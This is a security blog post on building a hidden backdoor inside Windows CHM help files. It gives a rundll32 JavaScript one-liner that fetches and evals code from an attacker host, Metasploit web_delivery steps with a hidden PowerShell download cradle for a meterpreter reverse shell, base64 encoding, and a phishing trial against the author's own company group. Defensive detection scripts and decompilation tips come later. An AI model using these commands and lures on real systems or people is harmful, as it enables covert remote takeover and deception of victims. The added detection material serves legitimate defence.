Talking about advanced combination techniques to create a perfect backdoor
0x00 Introduction
I previously wrote an article on client-side phishing, Using PowerShell Client for effective phishing. While testing each client type, I personally found the CHM file the most convenient to use, but its drawback is that it pops up a black console window, which is easily noticed. So how do we stop it from showing that black box? That is what this article introduces ~
0x01 CHM Introduction
Before introducing how to use CHM as a backdoor, you must first know what CHM is.
CHM (Compiled Help Manual) is the "compiled help file", Microsoft's new-generation help file format. It uses HTML as the source files and compiles and stores the help content in a database-like format. CHM supports JavaScript, VBScript, ActiveX, Java applets, Flash, common image files (GIF, JPEG, PNG), audio and video files (MID, WAV, AVI) and so on, and it can link to Internet URLs. Because it is easy to use, it is also widely used as an e-book format.
0x02 CHM Production
There are many ways to create CHM. There are multiple tools available for use, so I will not detail them here. In this test, EasyCHM is used to create a CHM file, which is very simple to use.
Create the following directory; the file contents are arbitrary:
Open EasyCHM, choose New > Browse, select the directory, and keep the default file types:
Click OK to preview the CHM file:
Select Compile to compile the CHM file.
0x03 CHM Execute Command
A demo posted on Twitter runs the calculator through CHM:
The Code is as follows:
```html
Command exec <script>x.Click();</script>
```
Write the above code into an HTML file, place it in the project directory, compile it to generate a CHM file, and run the file; the calculator pops up:
0x04 Removing the pop-up box
Some people who have tested nishang's Out-CHM found that running the generated CHM file shows an obvious pop-up box, like this:
One night I suddenly had an idea for a good way to keep it from appearing: use a JavaScript backdoor. After testing, a meterpreter session is obtained without any dialog box. This test uses a Python version modified from JSRat.ps1; it is available as MyJSRat, and its readme has the usage details.
The complete test process is as follows:
1. Combining CHM with the JS backdoor
Start the JSRat server in interactive mode:
```bash
python MyJSRat.py -i 192.168.1.101 -p 8080
```
Visiting http://192.168.1.101:8080/wtf returns the attack code:
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
```
After several tests, the command above was successfully written into the CHM; its HTML code is:
```html
This is a demo!
<script>x.Click();</script>
```
Run the compiled file and the JS interactive shell is obtained successfully:
If you execute a cmd /c command directly, a black box appears; use the run command instead to avoid showing it. After run, enter whoami > e:\1.txt and read the file back to get the output.
2. Get the meterpreter session
In this test, the meterpreter session is obtained directly by running the powershell command. After obtaining the client JS interactive shell, the system automatically runs the powershell command to obtain the meterpreter session. The procedure is as follows:
Enable MSF web_delivery:
```bash
~ msfconsole -Lq
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
msf exploit(web_delivery) >
[*] Started reverse TCP handler on 192.168.1.101:6666
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.101:8081/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```
A client with PowerShell can obtain the meterpreter session by executing the following command:
```bash
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```
Because the command contains special characters, save the following code to power.txt and encode it as base64:
```powershell
$n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```
Run the following command:
```bash
cat power.txt | iconv --to-code UTF-16LE | base64
```
The PowerShell command to execute is then:
```bash
powershell -ep bypass -enc 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
```
Run the following command to obtain the meterpreter session directly:
```bash
python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc 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"
```
During the test, from running the CHM to obtaining meterpreter, there was no obvious anomaly on the client and no black box at any point. The meterpreter session obtained is as follows:
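As an added defensive example (mine, not part of the original article): detection logic for the process chain this procedure produces, run over constructed Sysmon-style process-creation events. It assumes fields named ParentImage, Image and CommandLine; the hh.exe parent, the rundll32 javascript: child and the base64 UTF-16LE -enc PowerShell stage come from the steps above, and the decoder reverses the iconv/base64 encoding shown.

```python
import base64
import re

HELP_VIEWER = "hh.exe"
CHILD_SUSPECTS = {"rundll32.exe", "powershell.exe", "cmd.exe"}  # children seen in the chain above

def basename(path):
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def decode_enc_argument(cmdline):
    """Return the decoded -enc/-EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_event(ev):
    """Reasons one process-creation event looks like the CHM -> JSRat -> PowerShell chain."""
    parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    reasons = []
    if parent == HELP_VIEWER and image in CHILD_SUSPECTS:
        reasons.append(f"{HELP_VIEWER} spawned {image}")
    if image == "rundll32.exe" and re.search(r"javascript:|RunHTMLApplication", cmd, re.I):
        reasons.append("rundll32 running inline JavaScript")
    decoded = decode_enc_argument(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell decodes to: " + decoded[:60])
        if re.search(r"\bIEX\b|downloadstring", decoded, re.I):
            reasons.append("decoded payload downloads and evaluates remote code")
    return reasons

def find_suspicious(events):
    return [(i, r) for i, ev in enumerate(events) if (r := classify_event(ev))]

# Constructed sample events (Sysmon-style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\hh.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'
                    'h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");'},
    {"ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass -enc " + base64.b64encode(
         "IEX $n.downloadstring('http://192.168.1.101:8081/')".encode("utf-16-le")).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'hh.exe "C:\Users\test\manual.chm"'},
]
```

The third sample (explorer.exe opening a help file) is the benign baseline and produces no reasons.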
3. Will it be caught by antivirus?
Many people will ask whether it gets detected by antivirus. The following is the scan result from virscan:
http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba
0x05 Application scenarios
A picture says it all (guess whether you would click it):
Note: the file names in the picture are a few vulnerability exploitation tools that I renamed myself; this does not mean the tools shared by their original authors have a problem.
0x06 Actual test
Create a chm file with the method above and give it an attractive name, for example "Creating an AV-evading backdoor.chm", posted in the company's technical group. The actual test results are as follows:
Meterpreter sessions from several people were obtained successfully.
0x07 Defense
At present I have not found a specific defensive measure; if you know one, please share it. The best option is to improve personal security awareness: pay more attention to this type of file and try not to open them casually, and if you must, open them in a virtual machine. With procexp.exe you can see that a chm file with a backdoor starts a new process:
How can we trace the source of such a backdoor? In fact, a chm can be decompiled back into HTML using Windows' own hh.exe. The command is as follows:
```cmd
C:\Users\evi1cg\Desktop> hh -decompile test poc.chm
```
Here test is the output folder under the current directory. The execution result is as follows:
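As an added example (mine, not from the article): after decompiling with hh.exe as above, a small Python triage script that scans the extracted HTML for the patterns this article shows (an object element with a classid, x.Click(), rundll32 javascript:, RunHTMLApplication, WinHttpRequest, powershell -enc, cmd /c). The indicator list, the placeholder classid and the sample pages are constructed for illustration; decompile_chm wraps the hh -decompile command and therefore only works on Windows.

```python
import re
import subprocess
import sys
from pathlib import Path

# Indicators taken from the HTML and commands shown in this article; the list is illustrative.
INDICATORS = {
    "object_activex": re.compile(r"<object\b[^>]*classid", re.I),
    "auto_click": re.compile(r"\.\s*Click\s*\(\s*\)", re.I),
    "rundll32_js": re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I),
    "mshtml_hta": re.compile(r"RunHTMLApplication", re.I),
    "winhttp_activex": re.compile(r"WinHttp\.WinHttpRequest", re.I),
    "powershell_enc": re.compile(r"powershell(?:\.exe)?[^\n]*?-(?:enc|encodedcommand)\b", re.I),
    "cmd_launch": re.compile(r"\bcmd(?:\.exe)?\s*/c\b", re.I),
}

def scan_html(text):
    """Names of the indicators found in one decompiled page (or any command string)."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def decompile_chm(chm_path, out_dir):
    """Run the article's `hh -decompile <out_dir> <file.chm>`; Windows only (needs hh.exe)."""
    if sys.platform != "win32":
        raise RuntimeError("hh.exe -decompile is only available on Windows")
    subprocess.run(["hh.exe", "-decompile", str(out_dir), str(chm_path)], check=True)
    return Path(out_dir)

def triage_directory(directory):
    """Scan every .htm/.html under an extracted CHM; returns {relative path: [indicators]}."""
    root = Path(directory)
    findings = {}
    for page in root.rglob("*.htm*"):
        hits = scan_html(page.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[str(page.relative_to(root))] = hits
    return findings

# Constructed samples, not real files: a page in the shape shown above (classid is a placeholder),
# the rundll32 one-liner from the article, and a harmless help page.
SAMPLE_PAGE = ('<html><body>This is a demo!'
               '<object id="x" classid="clsid:CONSTRUCTED-PLACEHOLDER"></object>'
               '<script>x.Click();</script></body></html>')
SAMPLE_COMMAND = ('rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'
                  'h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");try{h.Send();}catch(e){'
                  'new ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}')
BENIGN_PAGE = '<html><body><h1>Chapter 1</h1><p>Click Help &gt; Index to search.</p></body></html>'
```

Typical use is `triage_directory(decompile_chm("poc.chm", "test"))` on a Windows analysis VM; a non-empty result names the pages worth reading by hand.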
0x08 Summary
This test combines several known attack techniques; the result is a bundled backdoor that is more concealed and almost "perfect". What it still lacks is that the file freezes briefly when opened. Sometimes combining small vulnerabilities causes major harm, and combining small tricks can likewise produce a major weapon. In the spirit of sharing, I hope friends can avoid being harmed by it.